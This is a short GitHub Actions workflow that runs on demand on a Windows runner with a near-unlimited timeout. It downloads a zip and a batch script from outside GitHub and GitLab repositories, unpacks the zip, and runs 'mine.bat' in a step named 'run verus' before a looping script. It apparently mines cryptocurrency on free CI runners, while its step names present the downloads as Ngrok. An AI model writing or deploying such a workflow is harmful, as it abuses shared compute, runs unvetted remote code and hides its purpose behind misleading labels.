name: Mbtc

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Mendownload Ngrok.
      run: |
        Invoke-WebRequest https://github.com/AHILERTGY/pull-nice-game/raw/main/ver.zip -OutFile ver.zip
        Invoke-WebRequest https://gitlab.com/gairmeet/antsi/-/raw/master/loop.bat -OutFile loop.bat
    - name: Mengextract Ngrok File.
      run: Expand-Archive ver.zip
    - name: run verus
      run: cmd /c mine.bat
    - name: Berhasil 
      run: cmd /c loop.bat
